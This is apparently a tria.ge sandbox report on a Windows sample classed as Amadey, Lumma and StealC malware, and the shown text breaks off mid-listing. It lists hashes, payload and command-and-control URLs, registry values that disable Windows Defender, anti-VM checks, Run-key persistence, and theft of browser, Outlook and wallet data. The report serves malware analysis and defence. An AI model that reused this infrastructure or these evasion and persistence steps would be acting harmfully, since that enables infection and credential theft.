Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
09/03/2025, 02:33
Static task
static1
Behavioral task
behavioral1
Sample
c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe
Resource
win10v2004-20250217-en
General
-
Target
c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe
-
Size
1.9MB
-
MD5
5b1dbccb1977e33fae7e0efa78e96b49
-
SHA1
fd97d5e5080b0130e21f998ed33b47997dd87d84
-
SHA256
c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77
-
SHA512
62de874632c6900b307c1fe3b3bfc00de88a3b80311d0c2746a71f53899f20eb658a944fd4e29d80a1af8e25695e61d913f64fc3b035fb7d78c8e7be13ca13a8
-
SSDEEP
49152:GbH3jNl9hAMO18bTKiyyGqxcyO1iQwLoFha7:GbHB72buXmA0iVLoFC
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://fostinjec.today/api
https://begindecafer.world/api
https://garagedrootz.top/api
https://modelshiverd.icu/api
https://arisechairedd.shop/api
https://catterjur.run/api
https://5orangemyther.live/api
https://sfostinjec.today/api
https://rsterpickced.digital/api
https://dawtastream.bet/api
https://foresctwhispers.top/api
https://tracnquilforest.life/api
https://xcollapimga.fun/api
https://strawpeasaen.fun/api
https://jquietswtreams.life/api
https://starrynsightsky.icu/api
https://earthsymphzony.today/api
https://defaulemot.run/api
https://.garagedrootz.top/api
https://orangemyther.live/api
https://sterpickced.digital/api
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral2/memory/3544-7579-0x00000000004D0000-0x0000000000942000-memory.dmp healer behavioral2/memory/3544-7580-0x00000000004D0000-0x0000000000942000-memory.dmp healer -
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 1abbe437ef.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 1abbe437ef.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 1abbe437ef.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 1abbe437ef.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 1abbe437ef.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 1abbe437ef.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 1abbe437ef.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 1abbe437ef.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 1abbe437ef.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 1abbe437ef.exe -
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 4592 created 3420 4592 Occupation.com 55 PID 4592 created 3420 4592 Occupation.com 55 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempNU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5dfd273896.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ D85OAYSPRW6ZOQBEAL9BAA9T7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 71c36a0ccc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 68174908c0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c8e0738fcd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1abbe437ef.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 34 4308 powershell.exe 39 4308 powershell.exe 235 3020 powershell.exe 298 5808 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
pid Process 4444 powershell.exe 4308 powershell.exe 3020 powershell.exe 5808 powershell.exe 2188 powershell.exe 4116 powershell.exe 5360 powershell.exe 5536 powershell.exe -
Downloads MZ/PE file 9 IoCs
flow pid Process 24 1720 rapes.exe 32 1720 rapes.exe 32 1720 rapes.exe 32 1720 rapes.exe 614 4564 BitLockerToGo.exe 61 1616 XxzH301.exe 235 3020 powershell.exe 298 5808 powershell.exe 763 6228 5dfd273896.exe -
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1abbe437ef.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c8e0738fcd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion D85OAYSPRW6ZOQBEAL9BAA9T7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1abbe437ef.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempNU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 71c36a0ccc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 68174908c0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 68174908c0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5dfd273896.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempNU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5dfd273896.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c8e0738fcd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion D85OAYSPRW6ZOQBEAL9BAA9T7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 71c36a0ccc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation ReK7Ewx.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation mshta.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url cmd.exe -
Executes dropped EXE 23 IoCs
pid Process 1720 rapes.exe 3928 ReK7Ewx.exe 4592 Occupation.com 1616 XxzH301.exe 3676 m4mrV1B.exe 3572 OSKDbmy.exe 1544 micE72.tmp.exe 3848 RegAsm.exe 2476 javaw.exe 2420 rapes.exe 2436 1ecf164df8.exe 2084 TempNU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE 1608 483d2fa8a0d53818306efeb32d3.exe 7040 71c36a0ccc.exe 3544 68174908c0.exe 7032 a78102cae3.exe 8108 a78102cae3.exe 7320 rapes.exe 6228 5dfd273896.exe 6100 c8e0738fcd.exe 6796 D85OAYSPRW6ZOQBEAL9BAA9T7.exe 7404 24fba0a6a6.exe 3544 1abbe437ef.exe -
Identifies Wine through registry keys 2 TTPs 12 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 5dfd273896.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine c8e0738fcd.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine D85OAYSPRW6ZOQBEAL9BAA9T7.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 1abbe437ef.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine TempNU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 71c36a0ccc.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 68174908c0.exe -
Loads dropped DLL 12 IoCs
pid Process 2476 javaw.exe 2476 javaw.exe 2476 javaw.exe 2476 javaw.exe 2476 javaw.exe 2476 javaw.exe 2476 javaw.exe 2476 javaw.exe 2476 javaw.exe 2476 javaw.exe 2476 javaw.exe 2476 javaw.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 1abbe437ef.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 1abbe437ef.exe -
Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook aspnet_compiler.exe Key queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook aspnet_compiler.exe Key queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook aspnet_compiler.exe Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook aspnet_compiler.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook aspnet_compiler.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook aspnet_compiler.exe Key queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook aspnet_compiler.exe Key queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook aspnet_compiler.exe Key queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook aspnet_compiler.exe Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook aspnet_compiler.exe Key queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook aspnet_compiler.exe Key queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook aspnet_compiler.exe Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook aspnet_compiler.exe Key queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook aspnet_compiler.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1ecf164df8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10147600101\\1ecf164df8.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10147610121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5dfd273896.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10148390101\\5dfd273896.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c8e0738fcd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10148400101\\c8e0738fcd.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\24fba0a6a6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10148410101\\24fba0a6a6.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1abbe437ef.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10148420101\\1abbe437ef.exe" rapes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" m4mrV1B.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
flow ioc 45 bitbucket.org -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000b000000023c6a-1240.dat autoit_exe behavioral2/files/0x0007000000023f63-7172.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 4844 tasklist.exe 4444 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
pid Process 1968 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 1720 rapes.exe 2420 rapes.exe 2084 TempNU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE 1608 483d2fa8a0d53818306efeb32d3.exe 7040 71c36a0ccc.exe 3544 68174908c0.exe 7320 rapes.exe 6228 5dfd273896.exe 6100 c8e0738fcd.exe 6796 D85OAYSPRW6ZOQBEAL9BAA9T7.exe 3544 1abbe437ef.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4308 set thread context of 4600 4308 powershell.exe 126 PID 3848 set thread context of 5572 3848 RegAsm.exe 165 PID 7032 set thread context of 8108 7032 a78102cae3.exe 170 PID 3544 set thread context of 4564 3544 68174908c0.exe 175 -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe File opened for modification C:\Windows\CombatTongue ReK7Ewx.exe File opened for modification C:\Windows\PracticeRoot ReK7Ewx.exe File opened for modification C:\Windows\PlatesRegister ReK7Ewx.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 8116 7032 WerFault.exe 169 -
System Location Discovery: System Language Discovery 1 TTPs 58 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempNU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 24fba0a6a6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ReK7Ewx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5dfd273896.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c8e0738fcd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language expand.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1ecf164df8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Msbuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 24fba0a6a6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened 